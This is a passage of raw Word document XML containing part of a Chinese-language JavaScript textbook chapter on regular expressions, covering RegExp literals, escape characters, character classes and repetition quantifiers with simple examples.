        <w:t>中的正则表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>是小菜一碟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章首先介绍用以描述</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>文本模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的正则表达式语法。随后讲解了使用正则表达式的</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="267" w:name="10_1_Zheng_Ze_Biao_Da_Shi_De_Ding_Yi_"/>
      <w:r>
        <w:t>10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　正则表达式的定义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的正则表达式用</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来创建</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，不过</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象更多的是通过一种特殊的直接量语法来创建。就像通过引号包裹字符的方式来定义字符串直接量一样，正则表达式直接量定义为包含在一对斜杠（</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>）之间的字符，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pattern=/s$/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>运行这段代码创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并将它</w:t>
      </w:r>
      <w:r>
        <w:t>赋值给变量</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>。这个特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象用来匹配所有以字母</w:t>
      </w:r>
      <w:r>
        <w:t>"s"</w:t>
      </w:r>
      <w:r>
        <w:t>结尾的字符串。用构造函数</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>也可以定义个与之等价的正则表达式，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pattern=new RegExp("s$");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>直接量和对象的创建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>就像字符串和数字一样，程序中每个取值相同的原始类型直接量均表示相同的值，这是显而易见的。程序运行时每次遇到对象直接量（初始化表达式）诸如</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>的时候都会创建新对象。比如，如果在循环体中写</w:t>
      </w:r>
      <w:r>
        <w:t>var a=[]</w:t>
      </w:r>
      <w:r>
        <w:t>，则每次遍历都会创建一个新的空数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>直接量则与此不同，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>规范规定，一个正则表达式直接量会在执行到它时转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，同一段代码所表示正则表达式直接量的每次运算都返回同一个对象。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>规范则做了相反的规定，同一段代码所表示的正则表达式直接量的每次运算都返回新对象。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>一直都是按照</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>规范实现的，多数最新版本的浏览器也开始遵循</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>，尽管目前该标准并未全面广泛推行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>正则表达式的模式规则是由一个字符序列组成的。包括所有字母和数字在内，大多数的字符都是按</w:t>
      </w:r>
      <w:r>
        <w:t>照直接量仅描述待匹配的字符的。如此说来，正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/java/</w:t>
      </w:r>
      <w:r>
        <w:t>可以匹配任何包含</w:t>
      </w:r>
      <w:r>
        <w:t>"java"</w:t>
      </w:r>
      <w:r>
        <w:t>子串的字符串。除此之外，正则表达式中还有其他具有特殊语义的字符，这些字符并不按照字面含义进行匹配。比如，正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/s$/</w:t>
      </w:r>
      <w:r>
        <w:t>包含两个字符，第一个字符</w:t>
      </w:r>
      <w:r>
        <w:t>"s"</w:t>
      </w:r>
      <w:r>
        <w:t>按照字面含义匹配，第二个字符</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>是一个具有特殊语义的元字符，用以匹配字符串的结束。因此这个正则表达式可以匹配任何以</w:t>
      </w:r>
      <w:r>
        <w:t>"s"</w:t>
      </w:r>
      <w:r>
        <w:t>结束的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>接下来的几节会进一步讲解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式中使用的各种字符和元字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="10_1_1_Zhi_Jie_Liang_Zi_Fu_"/>
      <w:r>
        <w:t>10.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　直接量字符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="268"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正如上文提到的，正则表达式中</w:t>
      </w:r>
      <w:r>
        <w:t>的所有字母和数字都是按照字面含义进行匹配的。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式语法也支持非字母的字符匹配，这些字符需要通过反斜线（</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>）作为前缀进行转义。比如，转义字符</w:t>
      </w:r>
      <w:r>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>用以匹配换行符。表</w:t>
      </w:r>
      <w:r>
        <w:t>10-1</w:t>
      </w:r>
      <w:r>
        <w:t>中列出了这些转义字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4119113" cy="2277373"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="17" name="00017.jpeg" descr="000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00017.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119113" cy="2277373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在正则表达式中，许多标点符号</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>具有特殊含义，它们是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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接下来的几节里，我们将学习这些符号的含义。某些符号只有在正则表达式的某些上下文中才具有某种特殊含义，在其他上下文中则被当成直接量处理。然而，如果想在正则表达式中使用这些字符的直接量进行匹配，则必</w:t>
      </w:r>
      <w:r>
        <w:t>须使用前缀</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>，这是一条通行规则。其他标点符号（比如</w:t>
      </w:r>
      <w:r>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t>和引号）没有特殊含义，在正则表达式中按照字面含义进行匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不记得哪些标点符号需要反斜线转义，可以在每个标点符号前都加上反斜线。另外需要注意，许多字母和数字在有反斜线做前缀时也有特殊含义，所以对于想按照直接量进行匹配的字母和数字，尽量不要用反斜线对其转义。当然，要想在正则表达式中按照直接量匹配反斜线本身，则必须使用反斜线将其转义。比如，正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>“/\\/”</w:t>
      </w:r>
      <w:r>
        <w:t>用以匹配任何包含反斜线的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="10_1_2_Zi_Fu_Lei_"/>
      <w:r>
        <w:t>10.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　字符类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将直接量字符单独放进方括号内就组成了字符类（</w:t>
      </w:r>
      <w:r>
        <w:t>character class</w:t>
      </w:r>
      <w:r>
        <w:t>）。一个字符类可以匹配它所包含的任意字符。因此，正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/[abc]/</w:t>
      </w:r>
      <w:r>
        <w:t>就和字母</w:t>
      </w:r>
      <w:r>
        <w:t>"a"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"b"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"c"</w:t>
      </w:r>
      <w:r>
        <w:t>中的任意一个都匹配。另外，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>“^”</w:t>
      </w:r>
      <w:r>
        <w:t>符号来定义否定字符类，它匹配所有不包含在方括号内的字符。定义否定字符类时，将一个</w:t>
      </w:r>
      <w:r>
        <w:t>“^”</w:t>
      </w:r>
      <w:r>
        <w:t>符号作为左方括号内的第一个字符。正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/[^abc]/</w:t>
      </w:r>
      <w:r>
        <w:t>匹配的是</w:t>
      </w:r>
      <w:r>
        <w:t>"a"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"b"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"c"</w:t>
      </w:r>
      <w:r>
        <w:t>之外的所有字符。字符类可以使用连字符来表示字符范围。要匹配拉丁字母表中的小写字母，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>/[a-z]/</w:t>
      </w:r>
      <w:r>
        <w:t>，要匹配拉丁字母表</w:t>
      </w:r>
      <w:r>
        <w:t>中任何字母和数字，则使用</w:t>
      </w:r>
      <w:r>
        <w:t>/[a-zA-Z0-9]/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于某些字符类非常常用，因此在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的正则表达式语法中，使用了这些特殊字符的转义字符来表示它们。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t>匹配的是空格符、制表符和其他</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>空白符，</w:t>
      </w:r>
      <w:r>
        <w:t>\S</w:t>
      </w:r>
      <w:r>
        <w:t>匹配的是非</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>空白符的字符。表</w:t>
      </w:r>
      <w:r>
        <w:t>10-2</w:t>
      </w:r>
      <w:r>
        <w:t>列出了这些字符，并且总结了字符类的语法（注意，有些字符类转义字符只能匹配</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字符，还没有扩展到可以处理</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符，但可以通过十六进制表示方法来显式定义</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符类，例如，</w:t>
      </w:r>
      <w:r>
        <w:t>/[\u0400-\u04FF]/</w:t>
      </w:r>
      <w:r>
        <w:t>用以匹配所</w:t>
      </w:r>
      <w:r>
        <w:t>有的</w:t>
      </w:r>
      <w:r>
        <w:t>Cyrillic</w:t>
      </w:r>
      <w:r>
        <w:t>字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4097547" cy="2273060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18" name="00018.jpeg" descr="000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00018.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097547" cy="2273060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，在方括号</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>之内也可以写这些特殊转义字符。比如，由于</w:t>
      </w:r>
      <w:r>
        <w:t>\s</w:t>
      </w:r>
      <w:r>
        <w:t>匹配所有的空白字符，</w:t>
      </w:r>
      <w:r>
        <w:t>\d</w:t>
      </w:r>
      <w:r>
        <w:t>匹配的是所有数字，因此</w:t>
      </w:r>
      <w:r>
        <w:t>/[\s\d]/</w:t>
      </w:r>
      <w:r>
        <w:t>就匹配任意空白符或者数字。注意，这里有一个特例。下面我们将会看到转义符</w:t>
      </w:r>
      <w:r>
        <w:t>\b</w:t>
      </w:r>
      <w:r>
        <w:t>具有的特殊含义，当用在字符类中时，它表示的是退格符，所以要在正则表达式中按照直接量表示一个退格符，只需要使用具有一个元素的字符类</w:t>
      </w:r>
      <w:r>
        <w:t>/[\b]/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="10_1_3_Zhong_Fu_"/>
      <w:r>
        <w:t>10.1.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　重复</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用刚刚学过的正则表达式的语法，可以把两位数描述成</w:t>
      </w:r>
      <w:r>
        <w:t>/\d\d/</w:t>
      </w:r>
      <w:r>
        <w:t>，四位数描述成</w:t>
      </w:r>
      <w:r>
        <w:t>/\d\d\d\d/</w:t>
      </w:r>
      <w:r>
        <w:t>。但到目前为止，还</w:t>
      </w:r>
      <w:r>
        <w:t>没有一种方法可以用来描述任意多位的数字，或者描述由三个字母和一个数字构成的字符串。这些正则表达式语法中较为复杂的模式都提到了正则表达式中某元素的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>重复出现次数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们在正则模式之后跟随用以指定字符重复的标记。由于某些重复种类非常常用，因此就有一些专门用于表示这种情况的特殊字符。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>用以匹配前一个模式的一个或多个副本。表</w:t>
      </w:r>
      <w:r>
        <w:t>10-3</w:t>
      </w:r>
      <w:r>
        <w:t>总结了这些表示重复的正则语法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4097547" cy="1552754"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="19" name="00019.jpeg" descr="000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00019.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097547" cy="1552754"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这里有一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/\d{2,4}///</w:t>
      </w:r>
      <w:r>
        <w:t>匹配</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/\w{3}\d?///</w:t>
      </w:r>
      <w:r>
        <w:t>精确匹配三个单词和一个可选的数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/\s+java\</w:t>
      </w:r>
      <w:r>
        <w:t>s+///</w:t>
      </w:r>
      <w:r>
        <w:t>匹配前后带有一个或多个空格的字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"java"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/[^(]*///</w:t>
      </w:r>
      <w:r>
        <w:t>匹配一个或多个非左括号的字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>时要注意，由于这些字符可能匹配</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个字符，因此它们允许什么都不匹配。例如，正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/a*/</w:t>
      </w:r>
      <w:r>
        <w:t>实际上与字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"bbbb"</w:t>
      </w:r>
      <w:r>
        <w:t>匹配，因为这个字符串含有</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>非贪婪的重复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
